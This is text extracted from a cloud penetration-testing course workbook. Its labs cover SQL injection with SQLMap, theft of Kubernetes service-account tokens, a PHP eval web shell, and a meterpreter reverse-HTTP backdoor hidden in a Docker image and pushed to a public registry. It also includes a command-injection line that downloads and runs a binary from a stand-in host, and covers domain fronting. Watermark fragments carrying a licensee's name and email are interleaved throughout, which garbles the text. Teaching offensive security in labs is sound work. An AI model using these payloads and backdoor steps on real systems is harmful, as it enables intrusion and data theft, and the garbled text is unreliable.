If we click on it we can enter anything we want to ping. Ping localhost on the machine
ne
ljo
Gregg Harris
au
Type: env
<p
What we can see are various variables including the 169.254 address space. This shell allows us to better
s
rri
understand how serverless environment works and their limitations. Each severless container will be di erent,
Ha
so a Python Runtime will behave di erently than a NodeJS runtime and the like. If you would like to see how the
gg
runtimes operate you can view this directory that holes the runtime:
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Look for the LAMBDA_RUNTIME_DIR= which in our case is the /var/runtime directory. You can explore
se
these les some will work some won't. If you get stuck ^C the shell and come back in.
n
ce
Li
Type: ls /var/runtime
Conclusion
live
Serverless environments, depending on the cloud provider, will have various limitations depending on the
provider. AWS Lambda for example is a rather constrained serverless environment that is di erent than Azure.
Our explorations will highlight the di erences.
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
20
Brief Intro
,20
28
pauljones166@outlook_com
SQL Injections can be very di cult to understand. There are many areas in which the injection can be broken,
ly
some of it will lead to successful exploitation and some will not. Some will be easy to uncover and will not. This
Ju
lab is designed to re ect on how to this is possible and in which conditions exploitation is available to us.
>
om
Overall Lab Architecture
_c
ok
We have an application that is located on the following URL:
23169600
http://sqlinj.<class-subdomain>.sec588.net/index.php
@
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
se
2. The order_id=
3. The result of the query to order_id=
4. The array is called via cURL in PHP.
live
is lled out with what is passed on the form.
is a json array that is successfully returned.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
Let's explore this environment so that we can try and uncover any types of SQL Injections.
>
om
_c
Requirements for This Lab
ok
This lab requies the student to have: 23169600 @
ou
tlo
Have a stable internet connection, with a webbrowser and to a copy of SQLMap.
66
s1
ne
Try It Yourself
ljo
Gregg Harris
au
"
4. Look at the Restful API Call:
re
http://sqlinj.<class-subdomain>.sec588.net/api/1234
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
6. Look at the underlying code in the walkthrough, and see if you can uncover the actual URL.
To
Walkthrough
ce
Li
http://sqlinj.<class-subdomain>.sec588.net/index.php
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
Let's try a few common SQL Injection tests that will try to display 'Errors Based SQL'. This type of SQL Injection is
ok
not as common, and we can see that this type of testing will not yield us any obvious result.
' or "
23169600 ou
tlo
in the form will not show us Errors based SQL. What about if we use a tool like
@
sqlmap.py ?
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
se
cd /opt/sqlmap
live
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net' --data
"order_id=1234&submit=submit"
3e1e3b497543e6c11ac8e4188959c93e
--data "order_id=1234&submit=submit" this send a POST value with the appropriate values that are
submitted with the form
20
Many of our API's are RESTful in nature, and this particular endpoint is no di erent. Let's take a look at the code
20
powering our website.
,
28
pauljones166@outlook_com
ly
Ju
<? php
>
om
if (isset($_POST['order_id']) && $_POST['order_id']!="") {
$order_id = $_POST['order_id'];
_c
$url = "http://localhost/api/$order_id;
ok
$client = curl_init($url);
23169600
curl_setopt($client,CURLOPT_RETURNTRANSFER,true);
$response = curl_exec($client);
@
ou
tlo
66
$result = json_decode($response);
s1
ne
ljo
Gregg Harris
Notice the following two lines in this statement:
au
<p
$order_id = $_POST['order_id'];
s
rri
Ha
$url = "http://localhost/api/$order_id";
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
The lines show us that the URL is being past in a HTTP POST and then past in as a URL.
: G
To
This type of information can be pulled out of websites in multiple ways. For this paricular lab we are skipping the
d
methods for obtaining the source code. Instead we are focusing on the URLs:
n se
ce
http://sqlinj.<class-subdomain>.sec588.net/api/1234
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
Open a Firefox Terminal and get to the appropriate URL:
>
om
Let's try getting a URL: http://sqlinj.<class-subdomain>.sec588.net/api/%27
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
What we see is an Apache Error Message, stating that a speci c page is not found. This is not a PHP error or
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
MySQL error message. There could be a few ways that this is occuring. Here is a shortcut.
: G
To
Our .htaccess le is re-writing URL's so that PHP based code is now a RESTful endpoint.
n
ce
Li
RewriteEngine On
live
# Turn on the rewriting engine
3e1e3b497543e6c11ac8e4188959c93e
The following two URL's are the same:
/api/1234
20
/api.php?order_id=1234
, 20
28
pauljones166@outlook_com
SQL Injecting the RESTful Endpoint
ly
Ju
What if we attempt SQL Injection on this particular endpoint?
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
We see a JSON Array is returned, the JSON Array is rendered NULL. Let's look at the code that is causing our
rri
Ha
injections:
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
$order_id = $_GET['order_id'];
d
se
live
The vulnerability here is that whatever is passed into the GET parameter of order_id is directly passed into SQL.
Without any ltering this is directy passed into the SQL Engine. This is classic SQL Injection, but without tools it
would not be discoverable.
Let's try the following, open a MATE terminal and run the following commands:
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 tlo
If you accept the default you will see that SQL Injection is now possible.
@
ou
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
se
We need to be careful as this particular system maybe a shared database instance. Heavy queries should be
Li
live
avoided if possible, and having shells are not possible in many cloud environments as they do provide us with
clear guidance on this. Attempt some of the following queries:
This should show us the databases on the system. Let's also see all the tables in the db database:
3e1e3b497543e6c11ac8e4188959c93e
The database should have a single table which would be the transactions
continue looking for more tables. Let's just play with the single database views.
table. We can dump this table, or
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db -T
20
transactions --count
, 20
28
We can see how many items are in the database using the count command, how can we safely dump a record to
pauljones166@outlook_com
see?
ly
Ju
>
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db -T
om
transactions --dump --start=1 --stop=1
_c
ok
This concludes our tour of SQLMap and how to nd injections in Cloud Native Applications. We do request that
Additional Resources
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
Kubernetes is a container orchestration and lifecycle management framework. It is not the the only framework
ly
that does this, as there are a few others, but by far and away, Kubernetes has done a very good job in being the
Ju
most commonly used one today. As such Kubernetes has a management layer that does is implemented on top
>
of existing cloud environments. There are several ways to manage Kubernetes, there is a "Managed
om
Con guration", in which a cloud provider will manage the Kubernetes cluster for you and use their native Access
_c
Management framework for Kubernetes maangement.
ok
23169600 ou
tlo
The other way to manage the system is what is known as "Unmanaged Kubernetes" in which the system is not
managed in any meaningful way by the Cloud Provider. This would be on-premise or an in the cloud managed
@
kubernetes. Kubernetes being such a complex system, does have "vendor supported" implementations. Which
66
ones?
s1
ne
Rancher
ljo
Gregg Harris
au
<p
Heptio
s
rri
Kontena
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
While each of their has their speci c reasons for existing, we will be working with two types of Kubernetes in our
:
To
Class Environments.
d
se
3e1e3b497543e6c11ac8e4188959c93e
Requirements for This Lab
20
This particular lab will require the following components:
20
1. The cli tools
,
aws
28
pauljones166@outlook_com
2. The pro le AWS keys obtained in Lab 1.4 and Used in Lab2.2
ly
3. kubectl binary
Ju
4. pierates binary
>
om
Try It Yourself
_c
ok
Walkthrough 23169600 @
ou
tlo
66
Some AWS Users may have rights to Kubernetes, this will depend on a few things.
ljo
Gregg Harris
au
1. Who has access rights to build a kubernetes con guration le that can get a user to have a proper
<p
Each user may or may NOT have access to the RBAC cluster, by default many AWS users do not. Kubernetes has
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
a Authentation and now an Authorization access control system.
: G
To
live
The following policy allows ALL service accounts to act as cluster administrators. Any application running in a
container receives service account credentials automatically, and could perform any action against the API,
including viewing secrets and modifying permissions. This is not a recommended policy.
3e1e3b497543e6c11ac8e4188959c93e
--user=admin \
--user=kubelet \
--group=system:serviceaccounts
20
20
We will begin by nding any EKS clusters:
,
28
pauljones166@outlook_com
ly
aws eks list-clusters --region us-east-1 --profile lab22
Ju
>
You should see a cluster called:
om
_c
class-eksctl-<class-subdomain>
ok
23169600 ou
tlo
Next we will build our own Kubernetes Con guration from EKS. While this may not be your starting point for
attacking a live Kubernetes Cluster, given that we have a set of API keys we can start here:
@
66
s1
lab22
ljo
Gregg Harris
au
The output should re ect that we have a new .kube/con g le created. With this le we can now manage a
<p
Kubernetes Cluster.
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
This does not grant you access to a Kubernetes Cluster it only grants you access to get a con guration. You
Li
live
should note that this was the default con guration in versions prior to 1.2, and while more and more rare, could
still be the case.
3e1e3b497543e6c11ac8e4188959c93e
This command should output any pods that we may have running in our environment. There are many pods and
containers that may be running. We can attack to one of these instances by running the following command:
20
kubectl exec -ti <container> /bin/bash
,20
28
pauljones166@outlook_com
This would allow us to interact with the containers /bin/bash environment.
ly
Ju
You may not get a prompt!
>
om
ls
_c
ok
This should work.
23169600 ou
tlo
Now that we have this level of access let's see how we can make better assumptions.
@
66
CTRL-C
s1
ne
Gregg Harris
au
<p
We have a few options, if you recall from an earlier exercise we had command injection .
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Find the ping-svc, this was the vulnerable process we are going to execute a few commands.
Li
live
Find a directory to run our payload, we will create one in /tmp/studentX replacing X with your numerical value:
3e1e3b497543e6c11ac8e4188959c93e
Using the command injection lab one of the options that we could also attempt is:
20
20
cmdinj.php?=curl+http://evilpayload/periatas+-O+/tmp/peiratas;/bin/chmod+777+/tmp/peiratas
,
28
pauljones166@outlook_com
This would the binary to the system, we would need a seperate way to gain access to the sysem.
ly
Ju
This will take some time to copy, once it is there we can then execute peirates, there a few ways to do this, we
>
could always
om
_c
ok
$ kubectl exec -i ping-svc-<random-number> /tmp/.studentX/peirates
23169600
If you miss the -i it will not work you will need to CTRL-C
@
ou
tlo
From here we will have a menu system. A few things we can:
66
s1
3
2. Type to get a list of secrets!
ljo
10
Gregg Harris
au
<p
One nal thing we can do is to actually use the service account kubelet if it is miss con gured against the
system. This would require a serious node miscon guration but these con gurations are not uncommon:
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
We should see a list of secrets, record the name of the secret you will need it for the next commands.
: G
To
The secret you are looking for will be of the following TYPE: kubernetes.io/service-acount-token
d
n se
ce
Token:
Alternatively, if you didn't have access to the Kubernetes API itself with kubectl but had access to the container,
3e1e3b497543e6c11ac8e4188959c93e
the values are found there.
Do not do this, but the the command below would be run from within the container. Below is an example.
20
20
root@<container># ls /var/run/secrets/kubernetes.io
,
28
pauljones166@outlook_com
ly
The ca.crt and token . Normally these two items would not cause an issue as every Kubernetes node
Ju
needs to speak back to the API server. This is of course unless someone has loosen that restriction. How could
>
we internally or externally leverage these types of credentials?
om
_c
ok
Below this command continues the pervious commands.
23169600
$ cat /home/sec588/.kube/config | grep server
@
ou
tlo
66
s1
Gregg Harris
server:
au
<p
Place the certi cate value within the 'certi cate value' section of kubetest without the quotes ' Place the server
value within the 'server value' section of kubetest without the quotes ' Place the token value within the 'token
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
You now have a cryptographically signed service account login for kubernetes.
:
To
d
se
$ nano kubetest
n
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
- cluster:
certificate-authority-data: 'certificate value'
server: 'server value'
name: development
contexts:
20
- context:
20
cluster: development
user: aws
,
28
pauljones166@outlook_com
name: aws
current-context: aws
ly
kind: Config
Ju
preferences: {}
>
users:
om
- name: aws
_c
user:
token: 'token value'
ok
23169600 @
ou
tlo
To see if this runs type the following:
66
s1
Gregg Harris
au
If you can list out pods you now have a backdoored account to the Kubernetes Management system.
<p
Conclusions
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Additional Resources
:G
To
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
While many of us are not developers, we may nd the need to build or operate a "heavy" or "light" shell as part
ly
of a penetration test. Understand the di erence between each of those, is key to understanding how we could
Ju
use an environment.
>
om
Requirements for This Lab
_c
ok
need the following tools:
23169600 @
ou
tlo
This lab does not require internet connectivity, the lab is self contained running from your computer. You will
66
Try It Yourself
Gregg Harris
au
<p
We wanted to demonstrate the big di erence between a Lightweight Shell and a bigger heavyweight shell.
s
rri
Ha
1. Go into /opt/php-webshell
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
2. Run the following command docker-compose up -d
: G
To
3. Access the test environment with a Web Browser by running: http://localhost:8080 , you will see a
d
page.
se
phpinfo()
n
ce
live
5. Once this is all running look at the di erences betewen each page by looking at the following les:
$ cat /opt/php-webshell/code/webshell.php
$ cat /opt/php-webshell/code/lightshell.php
3e1e3b497543e6c11ac8e4188959c93e
cat /etc/passwd
env
20
20
id
,
28
pauljones166@outlook_com
ly
Try and do it in a single command and make the output 'pretty', see how the more you add the more the shell
Ju
changes in Wireshark.
>
om
Walkthrough
_c
ok
Setting up the environment
23169600 @
ou
tlo
Let's open the MATE terminal so that we can get our local environment running.
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
lightshell.php : Whatever you PHP code you paste into the POST in the x variable will be run as php
code, this is di erent than webshell.php.
20
auth.php : The same as lightshell.php , but you need to provide a HTTP Authentication Bearer token.
, 20
28
pauljones166@outlook_com
Now that we understand each let's start our docker instance.
ly
Ju
$ cd /opt/php-webshell
>
om
$ docker-compose up -d
_c
ok
23169600
This should re ect that two containers are now running in your environment.
@
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Let's open a Firefox browser to validate what we are seeing by opening up firefox found on the desktop.
:G
To
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
Navigate to http://localhost:8080
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
Let's open up wireshark as well, the easiest way to do this is open up another MATE shell
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
To monitor our interface we can select it and click on the Shark n in the corner.
<p
Loopback
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
The Wireshark interface may zoom by, one of the ways you can see what is going on is to use the lter, type
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
Li
live
If you need to see what the HTTP request is doing you can right click and choose Follow | HTTP Request.
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
The portion in the red
23169600
is the request, the portion in the ou
tlo
blue
@
is the respose. Using this you can observe
each request.
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
The rst shell we will be looking at is the standard GET requested webshell.
3e1e3b497543e6c11ac8e4188959c93e
In the terminal window run the following command:
$ cat /opt/php-webshell/code/webshell.php
20
20
You will see a very small shell that will execute a system command based on whatever is passed to the variable
,
x. You can execute it like so:
28
pauljones166@outlook_com
ly
Ju
$ curl http://localhost:8080/webshell.php?x=ls
>
om
If we look at Wireshark what you will see is very small request with a large response:
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Given this let's run a few other commands so that you can see how the system works:
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
$ curl http://localhost:8080/webshell.php?x=id
: G
To
$ curl http://localhost:8080/webshell.php?x=env
d
n se
$ curl http://localhost:8080/webshell.php?x=cat+/etc/passwd
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
$ curl http://localhost:8080/lightshell.php
ljo
Gregg Harris
au
You will just see a Hi . To see why let's go ahead and cat out the le
<p
s
rri
$ cat /opt/php-webshell/code/lightshell.php
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
eval($_POST['x']);
d
n se
ce
Li
What this is telling the system is that whatever is being sent in a POST request after X must be evaluated as PHP.
Here what we see is the commands are bigger, we are just sending are system commands but entire PHP
3e1e3b497543e6c11ac8e4188959c93e
scripts can be sent in for evaluation at runtime.
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
You can always look at Wireshark and see the sizes. Obviously the response sizes will be large, but the request
66
sizes are now growing because these shells are very lightweight on the server but can be very large on the
s1
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
live
1. It's not encrypted in any way, even if you wrap HTTPS around it, that can be intercepted in a Proxy.
2. The shell has no access control, anyone can run it.
$ cat /opt/php-webshell/code/auth.php
3e1e3b497543e6c11ac8e4188959c93e
if ($_SERVER['HTTP_AUTHORIZATION'] == 'Bearer 12345') {
....
if(isset($_POST['x')) {
20
20
We have two di erent checks here, rst we need a HTTP Header:
,
28
pauljones166@outlook_com
ly
Ju
Authorization: Bearer 12345
>
om
This is a statically weak password, but still its not a bare shell. You also need to POST to 'x' just like in the
previous example. Let's explore this.
_c
ok
We can copy of the previous
add the header.
-data
23169600 @
ou
tlo
POST commands from before and let's modify it to change the URL and
66
http://localhost:8080/auth.php
ne
ljo
Gregg Harris
We now have an authorization based header. No one would want to hack this way not really, however if we are in
au
the middle of choosing a operation and choosing a shell here are the properties of a Web Shell you want:
<p
s
1. If it's a lightweight shell there will be less evidence on the host, if there is a heavy shell all of your shells will
rri
Ha
have a payload that may contain things like passwords for authentication.
2. You may want to consider a shell that provides some type of authorization mechanisms
gg
3. You may want to consider wrapping this in not just transport layer encryption such as HTTP but also in
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
encryption that is in the stream itself.
:G
To
Conclusions
d
se
The ability for us to valiate and understand the changes that occur in the most sensitive parts of our
n
ce
infrastructure environments will be pandemount to understanding what is occuring in the overall architecture.
Li
Are defenders monitoring the most sensitive and critical les in their network? Is there something that they can
live
do to make the environment better? This includes modi cations to Docker les and .travis.yml les which are
very sensitive les in an organization.
In Lab 4.1 we should have reverted this ssh con guration le, please make sure this is done.
3e1e3b497543e6c11ac8e4188959c93e
host github.com
20
Hostname github.com
IdentityFile ~/.ssh/sec588-wiki-vm-keys
20
#IdentityFile /home/sec588/.ssh/day4
,
User git
28
pauljones166@outlook_com
ly
Ju
>
This will allow wiki-updater.sh to work.
om
_c
Why This Lab Is Important
ok
Additional Resources
23169600 @
ou
tlo
66
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
This lab will introduce you to the concept of a backdoored container. There will be many di erent ways in which
ly
you can do this but we are going to show some of the gotcha's that you will encounter.
Ju
>
om
Requirements for This Lab
_c
ok
In this lab we will be creating an nGrok account for port fowarding TCP Tra c.
23169600
The following are the requirements for this to work:
@
ou
tlo
66
access to ngrok.io
s1
Gregg Harris
Docker will be running on your host.
au
<p
s
Please note this lab heavily will rely on Metasploit Meterpreter. Running any host antivirus on your host may
rri
inhibit the ability to execute meterpreter. Please remove that antivirus as required by the Course Requiremets.
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Try It Yourself
: G
To
2. Register your local ngrok with that account so that the authtoken works
Li
5. Build a Container that will execute the same payload from within the container.
Walkthrough
Let us begin by working on getting us a valid nGrok key. To do this open Firefox:
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Navigate to www.ngrok.com . This will provide you with a page to sign up with a valid ngrok account, slick
ne
ljo
SIGN UP
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Once you are logged in, you can now copy the authtoken in step 3.
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
The next part will to be to add the authtoken and test it. To do this you will need to open a terminal
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
If this worked correctl you should see a screenshot somewhat similar to below:
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
The URL is random for every student. Let's see how we can use this as a webserver
$ cd /tmp
3e1e3b497543e6c11ac8e4188959c93e
$ python -m 'SimpleHTTPServer' 9999
20
20
http://<random-ngrok-hostname>.ngrok.io
,
28
pauljones166@outlook_com
ly
The attack we are going to execute will look like the diagram below, and yes, it is a circular like attack:
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
Building a Linux Backdoor
3e1e3b497543e6c11ac8e4188959c93e
CTRL-C or close the Python SimpleHTTPServer terminal window.
Once you do this, you can either open a new window or continue in the same window.
20
20
First is building our backdoor, with msfvenom we will create a standard stageless meterpreter.
,
28
pauljones166@outlook_com
$ mkdir /home/sec588/files/workdir/container
ly
Ju
>
$ cd /home/sec588/files/workdir/container
om
_c
What follows here below with the ngrok hostname is without the HTTP.
ok
23169600 ou
tlo
$ /opt/metasploit-framework/msfvenom -p linux/x86/meterpreter_reverse_http LHOST=<ngrok-
@
66
Gregg Harris
au
$ sudo /opt/metasploit-framework/msfconsole
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
msf5> ()
use exploit/multi/handler ()
live
set PAYLOAD linux/x86/meterpreter_reverse_http```
set LPORT 9999``` ()
()
exploit -j ()
$ ./a
3e1e3b497543e6c11ac8e4188959c93e
This should execute our payload and in our metasploit window we should see a new session created.
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
Once you have the executed payload working you can now interact with the system:
66
s1
ne
msf5> sessions -i 1
ljo
Gregg Harris
au
meterpreter> sysinfo
<p
s
If the system returns information you have a working backdoor type exit in metasploit meterpreter.
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
CTRL-C in the .\a window.
: G
To
Let's now build an example of an evil container to execute our payload. Open a text editor to create the following
n
le:
ce
Li
live
$ nano /home/sec588/files/workdir/container/Dockerfile
3e1e3b497543e6c11ac8e4188959c93e
RUN apt update -y && apt-get install curl wget -y
COPY a /bin/a
CMD ["/bin/a"]
()
()
()
20
20
CTRL-X in nano will close the le. Now we will need build our container:
,
28
pauljones166@outlook_com
ly
$ docker build -t studentX-a .
Ju
>
om
Once this builds, you will then locate the docker image:
_c
ok
$ docker image ls
The container will appear broken, just leave this window running for a minute it will not show you a prompt. The
ljo
Gregg Harris
container should now be running let's attack to that process.
au
<p
$ docker ps
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
You will see a ContainerID copy that number and run the following command:
: G
To
You may nd that everyone in a while the system will no longer connect. This is a problem with NGROK and as
d
se
such you may have to: Exit ngrok, restart it, rebuild your msfvenom command with the new url.
n
ce
Li
Switch over to the metasploit console window. We can now execute the following commands from within
msfconsole: live
You may have to hit enter to get the msf5> prompt
msf5> sessions -l
meterpreter> sysinfo
3e1e3b497543e6c11ac8e4188959c93e
meterpreter> ps
This provides us a nice way to slide a backdoor into a container registry if we want to.
20
20
If you have extra time
,
28
pauljones166@outlook_com
There is a way to copy a container into a public registry like docker hub as an example.
ly
Ju
>
1. Register an account with Dockerhub (http://hub.docker.com) .
om
2. Record your username with dockerhub. Example, mosesrenegade is the author's.
_c
3. Copy your container into the Dockerhub system. You will need to:
ok
23169600 @
ou
tlo
$ docker login ()
66
Gregg Harris
au
You will then need to push that image into your repository:
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
online wiki (http://wiki.<class-subdomain>.sec588.net/ les/kubs.yaml) or the local wiki (http://localhost/wiki/ les/kubs.yaml)
6. Edit the YAML so that we can run it in the container, replace the XXXX with your student number. Replace the
DOCKERNAME/DOCKERCONTAINER information with your docker information. Here is an EXAMPLE (do not
copy and paste it will not work).
3e1e3b497543e6c11ac8e4188959c93e
run: student9001-a # This was replaced
name: student9001-a # This was replaced
()
()
20
run: student9001-a # This was replaced ()
20
()
,
28
pauljones166@outlook_com
ly
Ju
7. To see if you have a kubectl: kubectl working type the following:
>
om
kubectl get pods
_c
ok
23169600
8. If you nd that are having challeged with that you can do the following to restore your kubecon g.
@
ou
tlo
66
s1
#!/bin/bash ()
ne
rm -Rf /home/sec588/.kube/config ()
ljo
Gregg Harris
au
profile lab22 ()
<p
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
kubectl apply -f kubs.yaml
: G
To
0. You should go back to your metasploit section and if you nd that Metasploit is not able to run, use the
d
msf5> exploit -j
Li
live
It could be that exploit multi-handler did not work. This would x it.
Troubleshooting
Common issues include: kubectl get pods and you get the following issue:
This is usually something wrong with the container build. Run your container from your sec588 virtual machine
3e1e3b497543e6c11ac8e4188959c93e
and make sure it still connects!
Alternativately if you see the following CrashLoopBackOff or ImagePullBackOff and don't see an issue,
do the following:
20
20
Get your pod name:
,
28
pauljones166@outlook_com
ly
kubectl get pods
Ju
>
Then describe your pod:
om
_c
kubectl describe pods <podname>
ok
23169600 tlo
Look at the errors to see if the image isn't pulling or the container isn't running.
@
ou
66
Conclusions
s1
We may wish to deploy a container with a backdoor, this may allow us to bury a container very deep into an
ne
environment so that we can start to laterally pivot and move around. Given that we may be in this scenario it is
ljo
Gregg Harris
critical for us to understand how to build containers correctly.
au
<p
This lab takes what is a seemingly well known backdoor like meterpreter and let's us execute that in the context
gg
of a container.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Additional Resources
:
To
d
se
live
20
, 20
28
pauljones166@outlook_com
Brief Intro
ly
Ju
>
CDN Networks and Proxies are ubiquitous on the Internet today. The industry term for many of these devices
om
tend to be of one of the following:
_c
ok
1. Caching Devices
2. Proxies
3. Middleboxes
23169600 @
ou
tlo
66
Given that most tra c today is encrypted decrypting each packet is almost universally impossible. In some
s1
cases, it is not just cost-ine ective, but it also impossible when dealing with Desktop Applications. Many of the
ne
organization's content ltering devices leverage SNI information to lter but not decrypt the tra c. An attacker
ljo
Gregg Harris
can hide in their tra c sources by leveraging the CDN networks proxies to redirect attacks to their C2
au
environments.
<p
s
rri
These types of attacks are known as Domain Fronting, and we will be performing this attack today. To perform
Ha
this attack, we need to be able to control a CDN endpoint; for part one of our attack, we need to set up the CDN
Networks in Azure. Azure does still support Domain Fronting, and since our CDN shares the same system like
gg
the Microsoft CDN, we will be able to hide our tra c using Microsoft CDN systems.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
Try It Yourself
live
To try this lab yourself you need to perform the following steps:
1. Figure out what users are alive in the Azure Portal by trying di erent usernames and observe the results.
2. Log in with a Valid User.
Walkthrough
20
20
Finding the users in our environment.
,
28
pauljones166@outlook_com
Use Firefox to complete the following steps:
ly
Ju
>
Go to: https://portal.azure.com
om
_c
Come up with 5-10 random American/English rst names for example:
ok
23169600 @
ou
tlo
66
mike
will
s1
dustin
ne
lucas
ljo
nancy
Gregg Harris
au
barb
<p
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
sec588.net
d
sec588.org
se
sec588.com
n
ce
Li
For example:
live
3e1e3b497543e6c11ac8e4188959c93e
mike@sec588.org
mike@sec588.com
()
()
20
20
Do any of these work? What is the di erent in the login prompt when the following is used:
,
28
pauljones166@outlook_com
ly
Ju
